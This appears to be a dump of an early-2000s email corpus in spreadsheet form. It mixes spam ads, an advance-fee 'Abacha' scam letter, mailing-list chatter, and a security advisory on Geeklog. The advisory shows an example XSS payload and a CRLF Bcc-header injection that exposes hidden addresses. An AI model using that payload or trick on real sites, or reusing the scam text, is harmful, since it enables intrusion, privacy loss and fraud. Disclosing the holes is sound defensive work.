 ++++++&lt;/FONT&gt;&lt;FONT  COLOR=3D"#0000ff" BACK=3D"#ffffff" style=3D"BACKGROUND=
 -COLOR: #ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" =
 LANG=3D"0"&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;TO48 5-19 C18 P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
 &lt;BR&gt;3245611515161654646565
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;unbelievable
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;unbelievable
 &lt;BR&gt;processing----------- for--------- your------------ future
 &lt;BR&gt;
 &lt;BR&gt;unbelievable
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Internet Connectivity that beats the prices &amp; Quality of the Big Boys!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;695online The Nation Wide Low Cost Internet Provider&lt;/title&gt;
 &lt;/head&gt;
 &lt;body marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" rightmargin="0"&gt;
 &lt;table align="center" width="500" border="1" cellpadding="0" cellspacing="0" bordercolor="Black"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;table border="0" align="center" width="500" cellpadding="0" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td bgcolor="9BA5C5" height="50" align="center" colspan="2"&gt;&lt;i&gt;&lt;font size="+4" color="FFFFFF"&gt;&lt;b&gt;695 Online&lt;/b&gt;&lt;/font&gt;&lt;/i&gt;
 &lt;br&gt;
 &lt;font size="+1" color="FFFFFF" face="arial"&gt;&lt;b&gt;The Nation Wide $6.95 A Month Dial-Up Internet&lt;/b&gt;&lt;/font&gt;&lt;p&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;
 &lt;img src="http://65.112.138.121/rjs/images/finally.gif" hspace="0" vspace="0" alt="695Online" border="0" align="left"&gt;
 &lt;/td&gt;&lt;td align="center"&gt;
 &lt;!--- &lt;img src="http://65.112.138.121/rjs/images/695_logo3_100.jpg" hspace="0" vspace="0" alt="695Online" border="0"&gt; ---&gt;
 &lt;img src="http://65.112.138.121/rjs/images/stop_72.gif" alt="STOP Paying High Prices for a Dial-Up Connection" border="0"&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;Paying High Prices &lt;br&gt;for a Dial-Up Connection...!
 &lt;br&gt;
 Only $6.95&lt;sup&gt;&lt;font size="-1"&gt;*&lt;/font&gt;&lt;/sup&gt; Per Month&lt;/b&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;!--- &lt;img src="http://65.112.138.121/rjs/images/header500x100.jpg" hspace="0" vspace="0" alt="695Online" border="0"&gt;&lt;/a&gt; ---&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="2" align="left"&gt;
 &lt;TABLE CELLPADDING=15&gt;&lt;TR&gt;&lt;TD&gt;
 &lt;P&gt;&lt;font size="2" color="Red" face="Arial"&gt;&lt;b&gt;Most of us need a dial-up internet connection at some point. Maybe as a back up to our current high speed connection. Maybe when we travel, 
 or maybe for everyday use. But like so many of us, paying $21 to $31 a month is just getting to be too much. Especially if you still find it hard
 to get connected or hard to stay connected.
 695Online is the perfect Dial-up service for you. 
 &lt;/b&gt;&lt;/font&gt;
 &lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center" width="250"&gt;
 &lt;table align="center" width="250"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;img src="http://65.112.138.121/rjs/images/no_aol.gif" border="0" alt="AOL Dial Up Costs $23.85 " align="left"&gt;&lt;/a&gt;
 &lt;/td&gt;&lt;td&gt;
 &lt;img src="http://65.112.138.121/rjs/images/no_msn.gif" border="0" alt="MSN Dial Up Costs $21.95 Per Month" align="left"&gt;&lt;/a&gt;
 &lt;/td&gt;&lt;td&gt;
 &lt;img src="http://65.112.138.121/rjs/images/no_el.gif" border="0" alt="Earth Link Costs $21.95 Per Month" align="left"&gt;&lt;/a&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;
 &lt;font size="-2" face="Arial" color="Gray"&gt;$23.85&lt;br&gt;Per Month&lt;/font&gt;
 &lt;/td&gt;&lt;td align="center"&gt;
 &lt;font size="-2" face="Arial" color="Gray"&gt;$21.95&lt;br&gt;Per Month&lt;/font&gt;
 &lt;/td&gt;&lt;td align="center"&gt;
 &lt;font size="-2" face="Arial" color="Gray"&gt;$21.95&lt;br&gt;Per Month&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;td align="center"&gt;
 &lt;img src="http://65.112.138.121/rjs/images/star.gif" hspace="0" vspace="0" alt="695Online" border="0"&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="2" height=20&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign="top"&gt;&lt;td align="center"&gt;
 &lt;font size="-1" face="Arial" color="Gray"&gt;
 &lt;b&gt;
 Steady and Reliable Connectivity &lt;br&gt;
 Filters out unwanted emails &lt;br&gt;
 3 Email Addresses &lt;br&gt;
 24/7 Unlimited Internet &lt;br&gt;
 Affordable Price &lt;br&gt;
 Comes with a CD packed with software
 &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;&lt;td align="center"&gt;
 &lt;font size="-1" face="Arial" color="Gray"&gt;
 &lt;b&gt;Great Service &lt;br&gt;
 Easy to use &lt;br&gt;
 Nation Wide Local Access Numbers&lt;br&gt;
 Only $6.95 Per Month* &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="2" height="25"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;
 &lt;font face="Arial"&gt;
 &lt;a href="http://65.112.138.121/rjs/rjs51888.html"&gt;&lt;b&gt;Learn More&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;td align="center"&gt;&lt;font face="Arial"&gt;&lt;a href="http://65.112.138.121/rjs/rjs51888.html"&gt;&lt;b&gt;Sign Up NOW...!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="2" height="25"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="2" align="center"&gt;
 &lt;font face="Arial" size="-1"&gt;&lt;b&gt;Sign Up for 695online.com the Nation Wide Low Cost Internet Provider&lt;br&gt; and get Mail-Block for FREE...!&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;td colspan="2" align="center"&gt;&lt;img src="http://65.112.138.121/mail-block/images/mblogo_trans.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height="20"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="2"&gt;&lt;font size="-2" face="Arial"&gt;* Orders are billed for a minimum 3 month period. Sign Up NOW...and start Saving Money today...! &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="9BA5C5" colspan="2" align="center"&gt;&lt;font face="Arial" size="-2"&gt;
 If you do not wish to receive email&lt;br&gt; for this service, please click 
 &lt;a href="http://65.112.138.121/rjs/remove.html"&gt;REMOVE&lt;/a&gt;. &lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;&lt;font color="#FFFFFF" size="-3"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Low Cost Life Insurance -- FREE Quote wzwjt
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 10Mb/s through skin
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534163
 Date: Not supplied
 NTT DoCoMo have released a paper on the use of human flesh as a networking 
 medium: 
     A device attached to a PDA can send and receive weak electrical signals 
     through people, with human bodies as communications circuits, the paper 
     said, citing sources close to the companies. 
     Apparel and handbags have their own conductivity, allowing an electrical 
     connection to a PDA that can remain in one's pocket, the paper said. 
     In this way, people can exchange e-mail addresses, names and phone numbers 
     while shaking hands, with the data automatically written into both their 
     PDAs, the paper said.  
 Link[1] Discuss[2] (_Thanks, Alan!_)
 [1] http://www.news.com.au/common/story_page/0,4057,5239758%255E13762,00.html
 [2] http://www.quicktopic.com/boing/H/tFBrRGn3CvLk9
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall wrote:
 &gt;Why so fast?  Normal terminal velocity is much slower.
 &gt;  
 &gt;
 Not at 40,000 m. I found this article 
 (http://www.wired.com/news/print/0,1294,53928,00.html) :
 "The last person to try to break the highest free fall record died in 
 the attempt. In 1965, New Jersey truck driver Nick Piantanida suffered 
 catastrophic equipment failure when his facemask blew out at 57,000 
 feet. Lack of oxygen caused such severe brain damage that he went into a 
 coma and died four months later."
 And in amongst the flash at
 http://www.legrandsaut.org/site_en/
 you can discover that he will break the sound barrier at 35,000 m,
 presumably reaching top speed somewhere above 30,000.
 Owen
 &gt;  
 &gt;
 &gt;&gt;-----Original Message-----
 &gt;&gt;From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt;&gt;bitbitch@magnesium.net
 &gt;&gt;Sent: Sunday, September 08, 2002 8:36 AM
 &gt;&gt;To: (Robert Harley)
 &gt;&gt;Cc: fork@spamassassin.taint.org
 &gt;&gt;Subject: Re: The Big Jump
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;So uh, would this qualify for the Darwin awards if he doesn't make it?
 &gt;&gt;
 &gt;&gt;Freaking french people...
 &gt;&gt;   :-)
 &gt;&gt;-BB
 &gt;&gt;RH&gt; Today a French officer called Michel Fournier is supposed to get
 &gt;&gt;    
 &gt;&gt;
 &gt;in a
 &gt;  
 &gt;
 &gt;&gt;RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
 &gt;&gt;    
 &gt;&gt;
 &gt;km
 &gt;  
 &gt;
 &gt;&gt;RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
 &gt;&gt;    
 &gt;&gt;
 &gt;reach
 &gt;  
 &gt;
 &gt;&gt;RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
 &gt;&gt;    
 &gt;&gt;
 &gt;the
 &gt;  
 &gt;
 &gt;&gt;RH&gt; end, although with an automatic backup if he is 7 seconds from the
 &gt;&gt;RH&gt; ground and still hasn't opened it.
 &gt;&gt;
 &gt;&gt;RH&gt; R
 &gt;&gt;
 &gt;&gt;RH&gt; ObQuote:
 &gt;&gt;RH&gt;   "Veder, si aver si grossi li coglioni, come ha il re di
 &gt;&gt;    
 &gt;&gt;
 &gt;Franza."
 &gt;  
 &gt;
 &gt;&gt;RH&gt;   ("Let's see if I've got as much balls as the King of France!")
 &gt;&gt;RH&gt;   - Pope Julius II, 2 January 1511
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;--
 &gt;&gt;Best regards,
 &gt;&gt; bitbitch                            mailto:bitbitch@magnesium.net
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;
 &gt;  
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Would you like a $250 check?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Untitled&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;body link=#000000&gt;
 &lt;img src="http://track.optinllc.com/tev.asp?eid=20175" height="1" width="1"&gt;
 &lt;CENTER&gt;
 &lt;TABLE borderColor=#666699 height=300 width=275 border=12&gt;
    &lt;TR&gt;
      &lt;TD&gt;
        &lt;TABLE width=290&gt;
          &lt;TR&gt;
            &lt;TD&gt;&lt;a 
 href="http://track.optinllc.com/clicktrack.asp?eid=20175&amp;url=http%3A%2F%2Fwww.findanopportunity.com%3Fcpgn%3D2224"&gt;
            &lt;IMG SRC="http://64.251.20.8/20175/headline.gif" NOSEND="1"&gt;
            &lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD&gt;
              &lt;CENTER&gt;&lt;FONT size=4&gt;We're receiving checks for &lt;FONT
              color=#ff6600&gt;$100's&lt;/FONT&gt; and &lt;FONT color=#ff6600&gt;$1,000's&lt;/FONT&gt;
              every month - Let me show you how you can &lt;U&gt;EASILY&lt;/U&gt; 
 do the &lt;FONT
              color=#ff6600&gt;&lt;B&gt;EXACT&lt;/B&gt;&lt;/FONT&gt; same thing!&lt;/FONT&gt; 
 &lt;/CENTER&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD&gt;
              &lt;CENTER&gt;&lt;a 
 href="http://track.optinllc.com/clicktrack.asp?eid=20175&amp;url=http%3A%2F%2Fwww.findanopportunity.com%3Fcpgn%3D2224"&gt;&lt;IMG 
 SRC="http://64.251.20.8/20175/getfreeinfo.gif"
              NOSEND="1"&gt;
 &lt;/CENTER&gt;&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TABLE&gt;
    &lt;BR&gt;&lt;HR WIDTH="500"&gt;&lt;BR&gt;
 &lt;TABLE WIDTH="400" BORDER="0" CELLSPACING="2" CELLPADDING="0"&gt;
     &lt;TR&gt;
       &lt;TD WIDTH="100%"&gt;
         &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;You are receiving this email
         as a subscriber to the DealsUWant mailing list. &lt;BR&gt;To remove yourself
         from this and related email lists click here:&lt;BR&gt;
         &lt;a href="http://remove.optinllc.com"&gt;UNSUBSCRIBE MY EMAIL&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;
         &lt;P&gt;&lt;FONT SIZE="1" FACE="Verdana"&gt;&lt;BR&gt;
         Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
         301, Paragraph(a)(2)of S. 1618, a letter cannot be consideyellow
         Spam if the &lt;BR&gt;sender includes contact information and a method
         of &amp;quot;removal&amp;quot;.&lt;/FONT&gt;
         &lt;BR&gt;
         &lt;BR&gt;
       &lt;/TD&gt;
     &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/CENTER&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Extended Auto Warranties Here                                                   tupdt
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect your financial well-being.
 Purchase an Extended Auto Warranty for your Car today. CLICK HERE for a FREE no obligation quote.
 http://www3.all-savings.com/warranty/
 Car troubles always seem to happen at the worst possible time. Protect yourself and your family with a quality Extended Warranty for your car, truck, or SUV, so that a large expense cannot hit you all at once. We cover most vehicles with less than 150,000 miles.
 Buy DIRECT! Our prices are 40-60% LESS!
 We offer fair prices and prompt, toll-free claims service.  Get an Extended Warranty on your car today.
 Warranty plan also includes:
 1)   24-Hour Roadside Assistance.
 2)   Rental Benefit.
 3)   Trip Interruption Intervention.
 4)   Extended Towing Benefit.
 CLICK HERE for a FREE no obligation quote.
 http://www3.all-savings.com/warranty/
 ---------------------------------------
 To unsubscribe, go to: 
 http://www3.all-savings.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Approved Online, Internet, Buy Viagra              SJHFL
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Natures Own&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;CENTER&gt;
 &lt;TABLE WIDTH=3D380 CELLPADDING=3D3 BORDER=3D0 &gt;&lt;TR&gt;
 &lt;TD BGCOLOR=3D"#0066FF" &gt;&lt;font face=3D"arial black" size=3D3 color=3D"#FFF=
 FFF"&gt;&lt;p&gt;Free Introductory Offer!&lt;br&gt;
 Mother Nature's own all natural Viagra&lt;/p&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;
 &lt;TD BGCOLOR=3D"#FFFFFF"&gt;
 &lt;font face=3D"arial" size=3D2 color=3D"000000"&gt;&lt;p&gt;&lt;b&gt;
 &lt;li&gt;Men's and Women's Formula&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Sensation&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Frequency&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Pleasure&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Desire&lt;/li&gt;&lt;br&gt;
 &lt;li&gt;Increased Stamina&lt;/li&gt;&lt;br&gt;&lt;li&gt;Increased Libido&lt;/li&gt;&lt;br&gt;&lt;p&gt;
 &lt;a href=3D"http://www.hebalist.com/p610.html"&gt;
 Claim your Introductory Offer !&lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
 &lt;p&gt;&lt;font face=3Darial size=3D1.5&gt;
 To stop receiving future offers
 &lt;a href=3D"http://www.hebalist.com/service.html"&gt;Click Here&lt;/a&gt;&lt;/CENTER&gt; 
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR SIR,
 I am MRS MARIAM ABACHA, wife of the late Nigerian
 Head of State, General Sani Abacha who died on 
 the 8th
 of June 1998 while still on active duty. I am
 contacting you in view of the fact that we will 
 be of
 great assistance to each other likewise 
 developing a
 cordial relationship.
 I currently have within my reach the sum of 
 thirty
 six million United States Dollars 
 (US$36,000,000) in
 cash, which I intend to use for investment 
 purposes
 specifically in your country. This money came 
 as a
 result of a payback contract deal between my 
 late
 husband and a Russian firm on our country's
 Multi-Billion Dollars Ajaokuta Steel Plant. The
 Russian partners returned my husbands share of
 US$36,000,000 after his death and lodge it with 
 my
 late husband's security company in Nigeria of 
 which I
 am a director. Right now the new civilian 
 government
 have intensified their probe on my husband's 
 financial
 resources and they have revoked our licenses 
 that
 allows us to own a financial and oil company. 
 In view
 of this, I acted very fast to withdraw the
 US$36,000,000 from the company's vault and 
 deposited
 it in a privately erected security safe abroad.
 No record ever existed concerning the money 
 neither is
 the money traceable by the Government because 
 there is
 no documentation showing that we received the 
 money
 from the Russians.
 Due to the current situation in the country 
 concerning
 Government attitude towards my family, it has 
 become
 quite impossible for me to make use of this 
 money
 within, thus I seek assistance to transfer this 
 money
 into your safe bank account. On your consent, I 
 shall expect
 you to contact me urgently to enable us discuss
 details of this transaction.
 Bearing in mind that your assistance is needed 
 to
 transfer the funds, I propose a commission of 
 20% of
 the total sum to you for the expected services 
 and
 assistance. Your urgent response is highly 
 needed so
 as to stop further contacts. all correspondent 
 should be forwarded to this EMAIL:zenab.m@ompadec.zzn.con
 or you can call my son mobile:hamza   234-8023137978 I  use this 
 opportunity to implore you to exercise the most 
 utmost
 indulgence to keep this matter extra ordinarily
 confidential what ever your decision while I 
 await your
 prompt response.
 Best personal regards,
 MRS MARIAM ABACHA.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</si>
  <si>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speaking of things considered harmful, line lengths of over 80 chars
 are considered harmful.  cut it out.
 On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute wrote:
 &gt; Interesting. I've always wondered about things 'considered' to be bad. 
 &gt; Example the GOTO, most languages support a goto of some sort, so are
 &gt; gotos really bad?
 if used properly, they actually can make code more readable.  but those
 proper occasions are quite rare really.  it's a good idea to avoid them
 since over use of goto will create what niall calls "write-only code."
 what a wonderful expression.  my professors would spend entire lectures
 explaining that concept, and yet three little words convey it so well.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</si>
  <si>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[VulnWatch] Geeklog XSS and CRLF Injection
</t>
  </si>
  <si>
    <t xml:space="preserve">Geeklog XSS and CRLF Injection
 PROGRAM: Geeklog
 VENDOR: Tony Bibbs et al. &lt;geeklog-devel@example.sourceforge.net&gt;
 HOMEPAGE: http://geeklog.sourceforge.net/
 VULNERABLE VERSIONS: 1.3.5sr1, possibly earlier versions as well
 NOT VULNERABLE VERSIONS: 1.3.5sr2
 LOGIN REQUIRED: no
 SEVERITY: high
 DESCRIPTION:
 "Geeklog is a 'blog', otherwise known as a Weblog. It allows
 you to create your own virtual community area, complete with user
 administration, story posting, messaging, comments, polls, calendar,
 weblinks, and more! It can run on many different operating systems,
 and uses PHP4 and MySQL."
 (direct quote from the program's homepage)
 Geeklog is published under the terms of the GNU General Public
 License.
 SECURITY HOLES:
 1) Geeklog has got an XSS hole that affects both the stories and
 the comments. The program removes the HTML elements that are used
 for scripting, but it fails to remove the HTML attributes that are
 used for the same purpose, which leads to this hole.
 One example of an XSS attack would be:
 &lt;b onMouseOver="self.location.href='http://localhost/geeklog/'"&gt;life
 has made her that much bolder now&lt;/b&gt;
 When a victim moves the mouse pointer over the quote from "Lady
 Godiva's Operation", an intrinsic event occurs and the JavaScript
 code is executed.
 (There is also an XSS issue in the search engine. It was reported
 by ome1, and not by me.)
 2) Geeklog has got a CRLF Injection hole in User Profile: Send
 Email. The users' mail addresses are meant to be secret, but by
 using this hole, you can get someone's mail address anyway.
 The problem is that you can add extra mail headers, by using a
 CRLF combination followed by an extra mail header in the Subject
 field. One way to add them is saving the HTML document with the
 form, and changing the &lt;input type=text name=subject&gt; tag to a
 textarea. After opening the edited document in a web browser, you
 enter a Subject line in the textarea, press Enter, and then you
 enter your extra mail header. When the mail is sent, that header
 will be included. If the header in question is "Bcc: &lt;your own
 mail address&gt;", the message will silently be copied to you, thus
 revealing the recipient's mail address without them knowing.
 I have described this type of problem in further detail
 in my "CRLF Injection" paper, which is available at
 http://cert.uni-stuttgart.de/archive/bugtraq/2002/05/msg00079.html
 COMMUNICATION WITH VENDOR:
 The vendor was contacted on the 1st of July. Version 1.3.5sr2,
 which does not have any of these security holes (neither mine nor
 ome1's), was released on the 9th of July.
 RECOMMENDATION:
 I recommend that all administrators upgrade to version 1.3.5sr2.
 // Ulf Harnhammar
 ulfh@update.uu.se
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] getting single-user spam assassin to work in FreeBSD
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Clark C . Evans" said:
 &gt; Hello.  I'm hosted on a FreeBSD box where I can't modify the
 &gt; local Perl installation.  I downloaded and installed procmail
 &gt; in my home directory, and now I'm trying to get spamassassin to work...
 &gt; 
 &gt; bash-2.05$ perl Makefile.PL PREFIX=/home/cce SYSCONFDIF=/home/cce/etc
 &gt; Warning: prerequisite HTML::Parser 0 not found at (eval 1) line 219.
 &gt; Warning: prerequisite Pod::Usage 0 not found at (eval 1) line 219.
 &gt; 'SYSCONFDIF' is not a known MakeMaker parameter name.
 SYSCONFDIR.
 --j.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</si>
  <si>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&lt;html&gt;
 &lt;TABLE id=AutoNumber2 style="BORDER-COLLAPSE: collapse" 
       borderColor=#111111 cellSpacing=1 cellPadding=0 width=715 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top width=27&gt;&lt;a href="http://www.frugaljoe.com"&gt;&lt;IMG  
             src="http://www.frugaljoe.com/logo.jpg"  border=0&gt;&lt;/a&gt;&lt;/TD&gt;
           &lt;TD width=1 bgColor=#ffcc99&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;&lt;/TD&gt;
           &lt;TD vAlign=top&gt;&lt;I&gt;&lt;B&gt;&lt;FONT face=Verdana size=2&gt;
             &lt;CENTER&gt;Never Pay Retail!&lt;/FONT&gt;&lt;FONT face=Verdana size=0&gt;&lt;/B&gt;&lt;br&gt;&lt;/CENTER&gt;&lt;/I&gt;&lt;IMG height=20 
             src="http://www.salealerts.com/dot.gif" width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=715 bgColor=#ffcc99 colSpan=3 height=1&gt;&lt;IMG height=1 
             src="http://www.salealerts.com/dot.gif" width=1 
   border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/TD&gt;
 &lt;FONT face=Verdana size=1&gt;
 &lt;head&gt;
 &lt;title&gt;Direct Synergy - Household Creative Sep 02&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;!-- Fireworks 4.0  Dreamweaver 4.0 target.  Created Thu Sep 05 11:26:03 GMT-0400 2002--&gt;
 &lt;/head&gt;
 &lt;img src="http://brain.roistats.com/40535/138/marker?" width="1" height="1"&gt;
 &lt;body bgcolor="#ffffff" link="#666666"&gt;
 &lt;table border="0" cellspacing="0" cellpadding="0" align="center" width="404"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/logo.gif" width="404" height="34" vspace="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="center"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/headline.gif" width="296" height="56" vspace="10"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="0" width="401"&gt;
         &lt;tr&gt;
           &lt;td valign="top" align="center" width="163"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/ani.gif" width="131" height="176"&gt;&lt;/td&gt;
           &lt;td valign="top" align="left" width="191"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/subhead.gif" width="204" height="31"&gt;&lt;br&gt;&lt;br&gt;
             &lt;font face="Arial, Helvetica, sans-serif" size="2" color="#666666"&gt;Our 
             application process is quick and easy - And, you'll receive a response 
             back in moments. &lt;br&gt;
             &lt;br&gt;
             No lender's fees means you could save &lt;b&gt;$100's&lt;/b&gt; maybe even &lt;b&gt;$1,000's&lt;/b&gt;. 
             Compare for yourself and see the difference a Household loan can make. 
             &lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#666666"&gt; 
             &lt;/font&gt; &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="right"&gt;&lt;a href="https://www.householdloan.com/dl/lndl_Apply.jsp"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/applynow.gif" width="133" height="47" vspace="0" hspace="50" border="0"&gt;&lt;/a&gt;&lt;br&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt;
           &lt;td width="187"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/redbar.gif" width="187" height="23" vspace="5"&gt;&lt;/td&gt;
           &lt;td width="125"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/leadingcompetitor.gif" width="128" height="23" vspace="5"&gt;&lt;/td&gt;
           &lt;td width="110"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/household.gif" width="89" height="23" vspace="5"&gt;&lt;/td&gt;
         &lt;/tr&gt;
 		&lt;tr&gt;
           &lt;td valign="top" align="center" bgcolor="#FEFFE3" width="187"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="178"&gt;
               &lt;tr&gt;
                 &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2" color="#990000"&gt;Origination 
                   Fee* &lt;br&gt;
                   Doc Prep Fee &lt;br&gt;
                   Application Fee &lt;br&gt;
                   Credit Report Charge &lt;br&gt;
                   Processing Fee&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" bgcolor="#FFFFE7" width="125"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="111"&gt;
               &lt;tr&gt;
                 &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2" color="#CC6666"&gt;$250 
                   &lt;br&gt;
                   $200 &lt;br&gt;
                   $250 &lt;br&gt;
                   $25 &lt;br&gt;
                   $300&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" bgcolor="#FFFFE7" width="110"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="59"&gt;
               &lt;tr&gt;
                 &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2" color="#CC6666"&gt;$0* 
                   &lt;br&gt;
                   $0 &lt;br&gt;
                   $0 &lt;br&gt;
                   $0 &lt;br&gt;
                   $0 &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
